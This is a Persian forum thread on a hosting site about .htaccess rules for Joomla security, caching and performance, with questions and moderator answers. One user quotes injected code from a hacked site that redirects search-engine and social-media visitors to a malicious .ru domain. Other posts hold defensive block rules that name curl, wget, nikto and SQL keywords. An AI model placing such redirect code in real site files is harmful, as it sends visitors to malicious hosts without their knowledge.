Pooyan Afzali

تاپیک مقالات آموزشی htaccess جهت ارتقای امنیت, پایداری و بهبود عملکرد سایت

134 پست در این موضوع

سلام

یه سوال برایم پیش آمده آیا من می توانم کدی توی فایل

htaccess

قرار بدهم تا فقط کاربران مشخصی بتوانند وارد بخش کاربران بشوند

علت این امر این است که نمی خواهم دیگر کاربران به این لیست دسترسی داشته باشند تا سطح دسترسی ها نامعلوم باشد

با تشکر

Share this post


Link to post
Share on other sites
آموزش ووکامرس قالب جوملا قالب وردپرس قالب رایگان وردپرس قالب رایگان جوملا هاست نامحدود هاست جوملا هاست لاراول هاست وردپرس هاست ارزان هاست ربات تلگرام خرید دامنه آموزش ساخت ربات تلگرام با php آموزش لاراول آموزش cPanel آموزش php آموزش فرم ساز RSform آموزش ساخت ربات جذب ممبر آموزش ساخت ربات دوستیابی آموزش ساخت ربات فروشگاهی برای ووکامرس آموزش طراحی سایت داینامیک با php آموزش بخش پشتیبانی با rsticket

با سلام

آیا وجود فایل htaccess. به صورت مخفی و فایل htaccess.txt به طور همزمان در جوملا طبیعی است.

با سپاس

Share this post


Link to post
Share on other sites
سلام

یه سوال برایم پیش آمده آیا من می توانم کدی توی فایل

htaccess

قرار بدهم تا فقط کاربران مشخصی بتوانند وارد بخش کاربران بشوند

علت این امر این است که نمی خواهم دیگر کاربران به این لیست دسترسی داشته باشند تا سطح دسترسی ها نامعلوم باشد

با تشکر

درود

نمیتونید با htaccess همچین کاری رو انجام بدید

داخل مدیریت جوملا میتونید سطح دسترسی ایجاد و اعمال کنید

Share this post


Link to post
Share on other sites
با سلام

آیا وجود فایل htaccess. به صورت مخفی و فایل htaccess.txt به طور همزمان در جوملا طبیعی است.

با سپاس

درود

در بعضی از سرور ها بصورت پیشفرض این فایل رو برای جلوگیری از تغییر مخفی میکنه مدیر سرور

ولی مشکلی نیست تغییراتی که میخواید اعمال کنید داخل فایل htaccess. بزارید

Share this post


Link to post
Share on other sites

یه سری راه کار بگید که چی کار کنیم پهنای باند هاست اینقدر زود تموم نشه و حداکثر استفاده رو داشته باشیم:13:

ممنون

Share this post


Link to post
Share on other sites

ضمن سپاس فراوان از شما برای این تاپیک

htaccess روت من مشکل پیدا کرده به این ترتیب که دائما تغییر میکنه و این کدها :

																																																												
																													<IfModule mod_rewrite.c>																														
																													RewriteEngine On																														
																													RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*)																														
																													RewriteRule ^(.*)$ http://peachtreecardigan.ru/Nixon?8 [R=301,L]																														
																													RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)																														
																													RewriteRule ^(.*)$ http://peachtreecardigan.ru/Nixon?8 [R=301,L]																														
																													</IfModule>		

به ابتدا و این کد:

ErrorDocument 500 http://peachtreecardigan.ru/Nixon?8	

به انتهای اون اضافه میشه.

من هی فایل سالم و ریپلیس میکنم و چک میکنم میبینم درست شده ولی چند دقیقه بعد باز همین موضوع تکرار میشه.

ممنون میشم راهنمایی کنید.

Share this post


Link to post
Share on other sites

درود

بعد اینکه فایل سالم رو جایگزین میکنید کار خاصی انجام میدید؟

Share this post


Link to post
Share on other sites

سلام

نه هیچکاری انجام نمیدهم .

حتی دیگه چیزی هم نصب یا ... نکردم.

حتی اون آدرسی که در این کدها هست وبررسی کردم و دیدم بعضی از سایتهای امنیت وب آی پی این وب سایت و گذاشتن و اعلام کردن که مخرب هست منم از تو سرور آی پی رو مسدود کردم.

ولی متاسفانه باز هم این موضوع تکرار میشه.

Share this post


Link to post
Share on other sites

سلام به همه عزیزان

من این تاپیک رو تقریبا 70درصدشو خوندم

بعضی عزیزان خیلی تخصصی تونستن کدهایی رو ارائه کنن

من یک سوالی داشتم

به طور عمومی یک فایل کامل وجود داره که ما اونو دانلود کنیم و جای فایل روت بکنیم و طبق کدهایی که در خود این فایل باشه جلوگیری از حملات عمومی بشه ؟ حالا کاری با قسمتای اختصاصی برای پوشه های خاص یا چیزای دیگه ندارم

اون دستورهای عمومی که حملات مهم رو بلوکه کنه

اگر چنین فایلی باشه خیلی خوبه

اگر دوستان کسی میتونه چنین فایلی تهیه کنه و بگه که این فایل چه کارهایی رو میکنه

ممنونم

Share this post


Link to post
Share on other sites

درود بنا به درخواست یکی از کاربران عزیز یک نمونه فایل htaccess قرار میدم که تنظیمات خوبی در اون اعمال شده هم بلحاظ امنیتی و هم کارایی سایت و جلوگیری از بوتر ها که داخل چند سایت هم دیدم اینو و معمولا ازش استفاده میشه

البته اینم بگم فایل htaccess هر سایت میتونه خاص اون سایت باشه چرا که نظیمات هر سایتی شرایط خاص خودشو داره و این فایل ممکنه روی سایت شما بعضی قسمتهاش اجرا نشه چون تنظیمات سرور ها مختلفت هست و یا ممکنه

با اعمال این فایل سایتتون دیگه بالا نیاد پس حتما حتما از فایل htacess پیشفرض سایتتون یک پشتیبان بگیرید و اگر در زمینه این کد ها اطلاعای ندارید چایگزین نکنید

این فایل صرفا یک نمونه هست همین وبس و به این معنی نیست که کامل هست و بدون نقص

Section 1: Main Settings and Options # # Options: ALL,ExecCGI,FollowSymLinks,Includes,IncludesNOEXEC,Indexes # MultiViews, SymLinksIfOwnerMatch. # # Main Defaults. # Options +ExecCGI -Indexes DirectoryIndex index.html index.htm index.php DefaultLanguage en-US AddDefaultCharset UTF-8 ServerSignature Off ### ENVIRONMENT VARIABLES ### #SetEnv PHPRC /webroot/includes #SetEnv TZ America/Indianapolis #SetEnv SERVER_ADMIN webmaster@domain.tld ### MIME TYPES ### AddType video/x-flv .flv AddType application/x-shockwave-flash .swf AddType image/x-icon .ico ### FORCE FILE TO DOWNLOAD INSTEAD OF APPEAR IN BROWSER ### #-> http://www.htaccesselite.com/htaccess/addtype-addhandler-action-vf6.html #AddType application/octet-stream .mov .mp3 .zip ### ERRORDOCUMENTS ### ErrorDocument 404 "404 error" ErrorDocument 400 "400 error" ErrorDocument 401 "401 error" ErrorDocument 403 "403 error" ErrorDocument 405 "405 error" ErrorDocument 406 "406 error" ErrorDocument 409 "409 error" ErrorDocument 413 "413 error" ErrorDocument 414 "414 error" ErrorDocument 500 "500 error" ErrorDocument 501 "501 error" #=============================================================================# # SCRIPTING, ACTION, ADDHANDLER #=============================================================================# # Handlers be builtin, included in a module, or added with Action directive # default-handler: default, handles static content (core) # send-as-is: Send file with HTTP headers (mod_asis) # cgi-script: treat file as CGI script (mod_cgi) # imap-file: Parse as an imagemap rule file (mod_imap) # server-info: Get server config info (mod_info) # server-status: Get server status report (mod_status) # type-map: type map file for content negotiation (mod_negotiation) # fastcgi-script: treat file as fastcgi script (mod_fastcgi) ########### ### PARSE AS CGI ### #AddHandler cgi-script .cgi .pl .spl ### RUN PHP AS APACHE MODULE ### #AddHandler application/x-httpd-php .php .htm ### RUN PHP AS CGI ### #AddHandler php-cgi .php .htm ### CGI PHP WRAPPER FOR CUSTOM PHP.INI ### #AddHandler phpini-cgi .php .htm #Action phpini-cgi /cgi-bin/php5-custom-ini.cgi ### FAST-CGI SETUP WITH PHP-CGI WRAPPER FOR CUSTOM PHP.INI ### #AddHandler fastcgi-script .fcgi #AddHandler php-cgi .php .htm #Action php-cgi /cgi-bin/php5-wrapper.fcgi ### CUSTOM PHP CGI BINARY SETUP ### #AddHandler php-cgi .php .htm #Action php-cgi /cgi-bin/php.cgi ### PROCESS SPECIFIC FILETYPES WITH CGI-SCRIPT ### #Action image/gif /cgi-bin/img-create.cgi ### CREATE CUSTOM HANDLER FOR SPECIFIC FILE EXTENSIONS ### #AddHandler custom-processor .ssp #Action custom-processor /cgi-bin/myprocessor.cgi #=============================================================================# # HEADERS, CACHING AND OPTIMIZATION #=============================================================================# #-> http://www.htaccesselite.com/htaccess/cache-control-http-headers-vt65.html # 300 5 M # 2700 45 M # 3600 1 H # 54000 15 H # 86400 1 D # 518400 6 D # 604800 1 W # 1814400 3 W # 2419200 1 M # 26611200 11 M # 29030400 1 Y (never expire) ########### #### HEADER CACHING #### #-> http://www.htaccesselite.com/htaccess/caching-using-header-vt2.html #<FilesMatch "\.(flv|gif|jpg|jpeg|png|ico)$"> # Header set Cache-Control "max-age=2592000" #</FilesMatch> #<FilesMatch "\.(js|css|pdf|swf)$"> # Header set Cache-Control "max-age=604800" #</FilesMatch> #<FilesMatch "\.(html|htm|txt)$"> # Header set Cache-Control "max-age=600" #</FilesMatch> #<FilesMatch "\.(pl|php|cgi|spl|scgi|fcgi)$"> # Header unset Cache-Control #</FilesMatch> ### ALTERNATE EXPIRES CACHING ### #-> htaccesselite.com/d/use-htaccess-to-speed-up-your-site-discussion-vt67.html #ExpiresActive On #ExpiresDefault A604800 #ExpiresByType image/x-icon A2592000 #ExpiresByType application/x-javascript A2592000 #ExpiresByType text/css A2592000 #ExpiresByType text/html A300 #<FilesMatch "\.(pl|php|cgi|spl|scgi|fcgi)$"> # ExpiresActive Off #</FilesMatch> ### META HTTP-EQUIV REPLACEMENTS ### #<FilesMatch "\.(html|htm|php)$"> # Header set imagetoolbar "no" #</FilesMatch> #=============================================================================# # REWRITES AND REDIRECTS #=============================================================================# # REQUEST METHODS: GET,POST,PUT,DELETE,CONNECT,OPTIONS,PATCH,PROPFIND, # PROPPATCH,MKCOL,COPY,MOVE,LOCK,UNLOCK ########### ### REWRITE DEFAULTS ### #RewriteEngine On #RewriteBase / ### REQUIRE SUBDOMAIN ### #RewriteCond %{HTTP_HOST} !^$ #RewriteCond %{HTTP_HOST} !^subdomain\.domain\.tld$ [NC] #RewriteRule ^/(.*)$ http://subdomain.domain.tld/$1 [L,R=301] ### SEO REWRITES ### #RewriteRule ^(.*)/ve/(.*)$ $1/voluntary-employee/$2 [L,R=301] #RewriteRule ^(.*)/hsa/(.*)$ $1/health-saving-account/$2 [L,R=301] ### WORDPRESS ### #RewriteCond %{REQUEST_FILENAME} !-f # Existing File #RewriteCond %{REQUEST_FILENAME} !-d # Existing Directory #RewriteRule . /index.php [L] ### ALTERNATIVE ANTI-HOTLINKING ### #RewriteCond %{HTTP_REFERER} !^$ #RewriteCond %{HTTP_REFERER} !^http://(subdomain\.)?domain.tld/.*$ [NC] #RewriteRule ^.*\.(bmp|tif|gif|jpg|jpeg|jpe|png)$ - [F] ### REDIRECT HOTLINKERS ### #RewriteCond %{HTTP_REFERER} !^$ #RewriteCond %{HTTP_REFERER} !^http://(subdomain\.)?domain.tld/.*$ [NC] #RewriteRule ^.*\.(bmp|tif|gif|jpg|jpeg|jpe|png)$ http://google.com [R] ### DENY REQUEST BASED ON REQUEST METHOD ### #RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK|OPTIONS|HEAD)$ [NC] #RewriteRule ^.*$ - [F] ### REDIRECT UPLOADS ### #RewriteCond %{REQUEST_METHOD} ^(PUT|POST)$ [NC] #RewriteRule ^(.*)$ /cgi-bin/form-upload-processor.cgi?p=$1 [L,QSA] ### REQUIRE SSL EVEN WHEN MOD_SSL IS NOT LOADED ### #RewriteCond %{HTTPS} !=on [NC] #RewriteRule ^.*$ https://%{SERVER_NAME}%{REQUEST_URI} [R,L] #### ALTERNATATIVE TO USING ERRORDOCUMENT ### #-> http://www.htaccesselite.com/d/htaccess-errordocument-examples-vt11.html #RewriteCond %{REQUEST_FILENAME} !-f #RewriteCond %{REQUEST_FILENAME} !-d #RewriteRule ^.*$ /error.php [L] ### SEO REDIRECTS ### #Redirect 301 /2006/oldfile.html http://subdomain.domain.tld/newfile.html #RedirectMatch 301 /o/(.*)$ http://subdomain.domain.tld/s/dl/$1 #=============================================================================# # AUTHENTICATION AND SECURITY #=============================================================================# # http://www.htaccesselite.com/htaccess/basic-authentication-example-vt17.html # # Require (user|group|valid-user) (username|groupname) ########### ### BASIC PASSWORD PROTECTION ### #AuthType basic #AuthName "prompt" #AuthUserFile /.htpasswd #AuthGroupFile /dev/null #Require valid-user ### ALLOW FROM IP OR VALID PASSWORD ### #Require valid-user #Allow from 192.168.1.23 #Satisfy Any ### PROTECT FILES ### #<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$"> # Order Allow,Deny # Deny from all #</FilesMatch> ### PREVENT HOTLINKING ### #SetEnvIfNoCase Referer "^http://subdomain.domain.tld/" good #SetEnvIfNoCase Referer "^$" good #<FilesMatch "\.(png|jpg|jpeg|gif|bmp|swf|flv)$"> # Order Deny,Allow # Deny from all # Allow from env=good # ErrorDocument 403 http://www.google.com/intl/en_ALL/images/logo.gif # ErrorDocument 403 /images/you_bad_hotlinker.gif #</FilesMatch> ### LIMIT UPLOAD FILE SIZE TO PROTECT AGAINST DOS ATTACK ### #LimitRequestBody 10240000 #bytes, 0-2147483647(2GB) #=============================================================================# # SSL SECURITY #=============================================================================# #-> http://htaccesselite.com/d/redirecting-all-or-part-of-a-server-to-ssl-vt61 ########### ### MOST SECURE WAY TO REQUIRE SSL ### #-> http://www.askapache.com/2006/htaccess/apache-ssl-in-htaccess-examples.html #SSLOptions +StrictRequire #SSLRequireSSL #SSLRequire %{HTTP_HOST} eq "domain.tld" #ErrorDocument 403 https://domain.tld #=============================================================================# # SITE UNDER CONSTRUCTION #=============================================================================# # Heres some awesome htaccess to use when you are developing a site ########### ### COMBINED DEVELOPER HTACCESS CODE-USE THIS ### #<FilesMatch "\.(flv|gif|jpg|jpeg|png|ico|js|css|pdf|swf|html|htm|txt)$"> # Header set Cache-Control "max-age=5" #</FilesMatch> #AuthType basic #AuthName "Ooops! Temporarily Under Construction..." #AuthUserFile /.htpasswd #AuthGroupFile /dev/null #Require valid-user # password prompt for everyone else #Order Deny,Allow #Deny from all #Allow from 192.168.64.5 # Your, the developers IP address #Allow from w3.org # css/xhtml check jigsaw.w3.org/css-validator/ #Allow from googlebot.com # Allows google to crawl your pages #Satisfy Any # no password required if host/ip is Allowed ### DONT HAVE TO EMPTY CACHE OR RELOAD TO SEE CHANGES ### #ExpiresDefault A5 #If using mod_expires #<FilesMatch "\.(flv|gif|jpg|jpeg|png|ico|js|css|pdf|swf|html|htm|txt)$"> # Header set Cache-Control "max-age=5" #</FilesMatch> ### ALLOW ACCESS WITH PASSWORD OR NO PASSWORD FOR SPECIFIC IP/HOSTS ### #AuthType basic #AuthName "Ooops! Temporarily Under Construction..." #AuthUserFile /.htpasswd #AuthGroupFile /dev/null #Require valid-user # password prompt for everyone else #Order Deny,Allow #Deny from all #Allow from 192.168.64.5 # Your, the developers IP address #Allow from w3.org # css/xhtml check jigsaw.w3.org/css-validator/ #Allow from googlebot.com # Allows google to crawl your pages #Satisfy Any # no password required if host/ip is Allowed

بدرود

Share this post


Link to post
Share on other sites

درود

خیلی عالی بود جناب افضلی . امیدوارم دوستان به مسائل امنیتی بیشتر توجه کنن . البته ما عادت داریم وقتی هک میشیم تازه یادمون میفته که امنیت سایت در درجه اول هستش . کافیه یک هفته سایت پایین باشه اونوقت چه از لحاظ سئو و اعتبار و حتی کسب درآمد ، رقیبان نهایت استفاده را می برند .

موفق و سربلند باشید

Share this post


Link to post
Share on other sites
این موضوع رو قبلا زده بودم گفتم بیارمش اینجا که دیگه همه یه جا باشن وپخش نشن و لطفا مدیران این موضوع رو پاک کنن چون دیگه اینجا آوردم

خوب

:

TRACE and TRACK یک روش درخواست هست که باعث میشه اطلاعاتی که از طرف client یا کاربر به ibm http server ارسال میشه ، مجددا به client برگردانده میشه یک مثال ساده


$ telnet 127.0.0.1 8080
Trying...
Connected to 127.0.0.1.
Escape character is '^]'.
TRACE / HTTP/1.0
Host: foo
A: b
C: d

HTTP/1.1 200 OK
Date: Mon, 04 Oct 2004 14:07:59 GMT
Server: IBM_HTTP_SERVER
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
A: b
C: d
Host: foo

Connection closed.

خوب حالا ربطش چیه؟

برنامه های مخرب (از هر نوعش مثل فیشینگ ،تروجان، کد های مخرب جاوا و...) میتونن باعث بشند که وقتی قابلیت ردیابی(TRACE and TRACK) روی سرور فعال هست

با فریب مرورگر و درخواست خودسرانه اطلاعات کاربر مثل یوزنیم و پسورد و هر هرلاعاتی که به سرور آپاچی از طرف کاربر ارسال میشه به شخص ثالت دیگه ای فرستاده بشه و بدین صورت اطلاعات مهم و حیاتی

کاربر د اختیار دیگران قرار بگیره ک این متد در جوملا هم ثل بقیه صدق میکنه و میتونه باعث حملات xss یا Cross-Site Scripting به سایت مورد نظر بشه

برای غیر فعال کردن سرویس

TRACE and TRACK و جلوگیری از حملات xss یا Cross-Site Scripting

داخل فایل htaccess کد زیر رو وارد کنید


# disable TRACE and TRACK in the main scope of httpd.conf
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* – [F]
RewriteCond %{REQUEST_METHOD} ^TRACK
RewriteRule .* – [F]
…
<VirtualHost www.example.com>
…
# disable TRACE and TRACK in the [url="http://www.example.com"]www.example.com[/url] virtual host
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* – [F]
RewriteCond %{REQUEST_METHOD} ^TRACK
RewriteRule .* – [F]
</VirtualHost>
#

موفق باشید

سلام مرسی از اموزش های خوبتون

یه سوال داشتم این کد که بالا گفتین من وارد کردم ولی دیگه سایت بالا نیومد بعد پاک کردم بالا اومد

لطفا راهنمایی بفرمایید

Share this post


Link to post
Share on other sites
درود

همونطور که میدونید حملات تزریق کد بعلت نفص امنیتی در پایگاه داده معمولا بوجود میاد که البته دیگه با پیشرف و افزاریش امنیت و اصول طراحی استاندارد سایت دیگه این باگ از بین میره

و امکان هم شدن از این طریف نزدیک صفر میشه اما یک کد قرار میدم که با قرار دادنش در htaccess تا حد خیلی زیادی از حملات sql injection در امان خواهید بود و در صورتی که کسی بخواد با این روش شما رو هک کنه با صفحه hack.cfm روبرو میشه


   RewriteEngine On

   Options +FollowSymLinks
   ServerSignature Off

   RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC,OR]
   RewriteCond %{THE_REQUEST} ^.*(\\r|\\n|%0A|%0D).* [NC,OR]

   RewriteCond %{HTTP_REFERER} ^(.*)(<|>|'|%0A|%0D|%27|%3C|%3E|).* [NC,OR]
   RewriteCond %{HTTP_COOKIE} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|).* [NC,OR]
   RewriteCond %{REQUEST_URI} ^/(,|;|<|>|">|"<|/|\\\.\.\\).{0,9999}.* [NC,OR]

   RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
   RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
   RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
   RewriteCond %{HTTP_USER_AGENT} ^.*(libwww-perl|curl|wget|python|nikto|scan).* [NC,OR]
   RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|).* [NC,OR]

   RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR]
   RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR]
   #RewriteCond %{QUERY_STRING} ^.*\.[A-Za-z0-9].* [NC,OR]
   RewriteCond %{QUERY_STRING} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|).* [NC]

   RewriteRule ^(.*)$ hack.cfm

gift

:33:اقا این یکی هم زدیم سایت ترکید

این ارور مید

[h=1]Not Found[/h] The requested URL /hack.cfm was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

چرااااا:37::37::37:

Share this post


Link to post
Share on other sites

درود

دوست عزیز عکل کردن این کد ها بستگی به عوامل متعددی داره

بسته به پیکربندی ومجوز های سرور میتونه متفاوت باشه

Share this post


Link to post
Share on other sites

درود

دوست عزیز عکل کردن این کد ها بستگی به عوامل متعددی داره

بسته به پیکربندی ومجوز های سرور میتونه متفاوت باشه

Share this post


Link to post
Share on other sites

با درود خدمت اساتید انجمن.

یه سوال داشتم.

می خواستم ببینم که این کد هایی که زحمت کشدیدن تو این پست قرار دادید می شه همه رو توو فایل htaccess قرار داد؟آخه همشون خیلی خووب و کاربردیه.آدم دلش می خواد از همه شون بهره ببره.

ببخشید اگه سوالم مبتدیانه ست.

Share this post


Link to post
Share on other sites

درود

بستگی داره هدفتون چیه؟

دقت کنید این کد ها میتونه روی سرور فشار وارد کنه اگه درست ازشون استفاده نکنید

یا ممکنه باعث بالا نیومدن سایت بشه

در واقع چاقوی دو لبه هست

با آگاهی و نیاز استفاده کنید

Share this post


Link to post
Share on other sites

با سلام

امکان داره کدی بگذارید که فقط ایرانی ها به وب سایت دسترسی پیدا کنند و راهی هست برای جلوگیری از هک

متشکر از شما

Share this post


Link to post
Share on other sites

سلام به دوستان و اساتید امر

من واسه فایلهای مختلف از کدهای اکسپایر استفاده کردم

### EXPIRES
# month A2592000, week A604800, day A86400, hour A3600,15 min A900
ExpiresActive On
ExpiresDefault A86400
ExpiresByType image/x-icon A2592000
ExpiresByType application/x-javascript A2592000
ExpiresByType text/css A2592000
ExpiresByType image/gif A604800
ExpiresByType image/png A604800
ExpiresByType image/jpeg A604800
ExpiresByType text/plain A604800
ExpiresByType application/x-shockwave-flash A604800
ExpiresByType video/x-flv A604800
ExpiresByType application/pdf A604800
ExpiresByType text/html A900

حالا اگه بخوام این کدها روی چندتا فایل خاص اعمال نشه (یا روی یک پوشه اعمال نشه) چیکار باید بکنم؟؟؟

(کد اعمال بر روی پوشه خاص رو دارم کد عدم اعمال بر روی پوشه ای خاص رو میخوام)

Share this post


Link to post
Share on other sites
با سلام

امکان داره کدی بگذارید که فقط ایرانی ها به وب سایت دسترسی پیدا کنند و راهی هست برای جلوگیری از هک

متشکر از شما

درود

میتونید از افزونه آی پی بلاکر استفاده کنید که اسم کشور ها رو داره و 9مشونو انتخاب کنید

Share this post


Link to post
Share on other sites
سلام به دوستان و اساتید امر

من واسه فایلهای مختلف از کدهای اکسپایر استفاده کردم

### EXPIRES
# month A2592000, week A604800, day A86400, hour A3600,15 min A900
ExpiresActive On
ExpiresDefault A86400
ExpiresByType image/x-icon A2592000
ExpiresByType application/x-javascript A2592000
ExpiresByType text/css A2592000
ExpiresByType image/gif A604800
ExpiresByType image/png A604800
ExpiresByType image/jpeg A604800
ExpiresByType text/plain A604800
ExpiresByType application/x-shockwave-flash A604800
ExpiresByType video/x-flv A604800
ExpiresByType application/pdf A604800
ExpiresByType text/html A900

حالا اگه بخوام این کدها روی چندتا فایل خاص اعمال نشه (یا روی یک پوشه اعمال نشه) چیکار باید بکنم؟؟؟

(کد اعمال بر روی پوشه خاص رو دارم کد عدم اعمال بر روی پوشه ای خاص رو میخوام)

برای این کار به این مثال توجه کنید

<IfModule mod_expires.c>
# disable caching forthis directory mod_expires for this directory
ExpiresActive off
</IfModule>

Share this post


Link to post
Share on other sites
متاسفانه نگفتید که این کد ها را در کدام قسمت فایل htaccess قراردهیم؟

درود

پایین کد های پیشفرض فایل

Share this post


Link to post
Share on other sites

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری